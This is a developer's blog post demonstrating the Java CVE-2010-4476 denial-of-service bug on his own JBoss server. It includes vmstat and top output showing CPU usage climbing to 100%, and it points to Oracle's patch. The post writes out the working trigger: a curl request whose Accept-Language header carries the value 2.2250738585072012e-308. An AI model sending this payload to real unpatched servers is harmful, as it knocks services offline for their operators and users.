About Me

My photo
Working as Technical Lead in CollabNET software private limited.

Friday 11 February, 2011

DoS vulnerability in all java servers that was just published in CVE-2010-4476

Oracle has given a fix for this here

Tested this bug on my jboss server and watched the increasing cpu utilization. Excited about this as I've started looking vmstat and top command outputs after yesterday's learnings about them which reports these performance details.

Here is the initial "vmstat 2" output when plain jboss process is running. You can see the 'us' column doesn't go beyond 6. 'us' columns is nothing but the time spent running non-kernel code which reflects to cpu utilization.

[prakash@cu255 CTF5.4.1]$ vmstat 2
procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
r b swpd free buff cache si so bi bo in cs us sy id wa st
1 0 68444 168692 243820 747388 0 1 4 36 19 4 1 1 99 0 0
0 0 68444 168692 243820 747388 0 0 0 0 1113 561 0 0 100 0 0
1 0 68444 168692 243820 747388 0 0 0 0 1107 559 0 0 100 0 0
1 0 68444 162988 243820 747388 0 0 0 68 1115 528 33 2 65 0 0
0 0 68444 162988 243820 747388 0 0 0 0 1112 567 0 1 99 0 0
0 0 68444 162864 243820 747392 0 0 0 92 1117 563 0 0 99 0 0
0 0 68444 162864 243820 747392 0 0 0 98 1125 553 0 0 100 0 0
0 0 68444 162864 243820 747392 0 0 0 0 1115 575 0 1 98 0 0
0 0 68444 162864 243820 747392 0 0 0 60 1108 552 0 0 100 0 0
0 0 68444 162864 243820 747392 0 0 0 0 1120 575 0 0 100 0 0
0 0 68444 162864 243820 747392 0 0 0 60 1107 551 0 1 99 0 0
1 0 68444 162864 243820 747392 0 0 0 14 1120 570 0 0 100 0 0
1 0 68444 162864 243820 747392 0 0 0 0 1112 558 0 0 99 0 0
0 0 68444 162864 243824 747392 0 0 0 76 1109 561 0 1 99 0 0
0 0 68444 162864 243824 747392 0 0 0 0 1116 580 0 0 100 0 0
0 0 68444 162864 243824 747392 0 0 0 68 1113 562 0 0 100 0 0
0 0 68444 162864 243824 747392 0 0 0 6 1122 582 0 1 99 0 0
0 0 68444 162864 243824 747392 0 0 0 0 1102 541 0 0 100 0 0
1 0 68444 162484 243824 747392 0 0 0 86 1120 725 2 2 96 0 0
0 0 68444 162484 243824 747392 0 0 0 0 1108 570 0 0 100 0 0
0 0 68444 162484 243824 747392 0 0 0 72 1109 562 0 0 100 0 0
0 0 68444 162484 243824 747392 0 0 0 0 1120 576 0 1 99 0 0
0 0 68444 162484 243824 747428 0 0 0 16 1107 555 0 0 100 0 0
0 0 68444 161864 243824 747432 0 0 0 510 1187 657 6 5 89 0 0


Now I issue the DoS vulnerability command in another terminal using curl.

curl -H "Accept-Language: en-us;q=2.2250738585072012e-308" http://${HTTP_HOST}/requested_page

Here you can see, how much the 'us' column increased, it utilized to 100%. This makes my cpu % worst.

procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
r b swpd free buff cache si so bi bo in cs us sy id wa st
2 0 68444 161740 243856 747508 0 0 0 80 1108 592 99 1 0 0 0
1 0 68444 161740 243856 747508 0 0 0 0 1102 579 98 2 0 0 0
1 0 68444 161740 243856 747508 0 0 0 0 1108 569 99 1 0 0 0
1 0 68444 161740 243856 747508 0 0 0 60 1103 571 98 2 0 0 0
1 0 68444 161740 243856 747508 0 0 0 0 1108 571 99 1 0 0 0
1 0 68444 161740 243856 747512 0 0 0 94 1107 595 99 1 0 0 0
1 0 68444 161740 243856 747512 0 0 0 48 1085 544 99 1 0 0 0
1 0 68444 161740 243856 747512 0 0 0 8 1111 639 99 1 0 0 0
1 0 68444 161740 243856 747516 0 0 0 92 1102 541 99 1 0 0 0
1 0 68444 161740 243856 747516 0 0 0 0 1114 577 99 1 0 0 0
1 0 68444 161740 243856 747520 0 0 0 36 1116 596 98 2 0 0 0
1 0 68444 161740 243860 747528 0 0 0 124 1106 578 99 1 0 0 0
1 0 68444 161740 243860 747528 0 0 0 0 1107 585 98 2 0 0 0
1 0 68444 161740 243860 747528 0 0 0 72 1100 569 99 1 0 0 0
2 0 68444 161740 243860 747528 0 0 0 0 1112 591 99 1 0 0 0
1 0 68444 161740 243860 747528 0 0 0 0 1101 576 99 1 0 0 0
1 0 68444 161740 243860 747532 0 0 0 86 1119 575 99 1 0 0 0
1 0 68444 161740 243860 747532 0 0 0 0 1102 561 99 1 0 0 0
1 0 68444 161740 243860 747532 0 0 0 82 1109 578 99 1 0 0 0
1 0 68444 161740 243860 747532 0 0 0 0 1108 574 98 2 0 0 0
1 0 68444 161740 243860 747532 0 0 0 0 1099 589 100 0 0 0 0


Also the top command:

top - 11:58:41 up 17 days, 15 min, 4 users, load average: 1.05, 1.09, 1.00
Tasks: 123 total, 3 running, 119 sleeping, 0 stopped, 1 zombie
Cpu(s): 98.7%us, 1.0%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.3%si, 0.0%st
Mem: 2059588k total, 1936104k used, 123484k free, 244512k buffers
Swap: 2096472k total, 68432k used, 2028040k free, 760124k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
28975 prakash 21 0 1428m 528m 16m S 99.9 26.3 20:59.60 /usr/java/jdk1.6.0_18//bin/java -Xms1024m -Xmx1024m -XX:MaxPermSize=256m -server -XX:+HeapDumpOn
29768 prakash 21 0 506m 77m 9100 S 0.3 3.8 0:03.08 /usr/java/jdk1.6.0_18//bin/java -Xms1024m -Xmx1024m -XX:MaxPermSize=256m -server -XX:+HeapDumpOn
10063 prakash 15 0 123m 2812 1648 S 0.0 0.1 0:00.20 /usr/sbin/httpd

You can see the %CPU of my jboss server box went up to 99.9%. So, it's good to have this patch in the jre versions which the server use.
Posted by at
Labels: , , , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)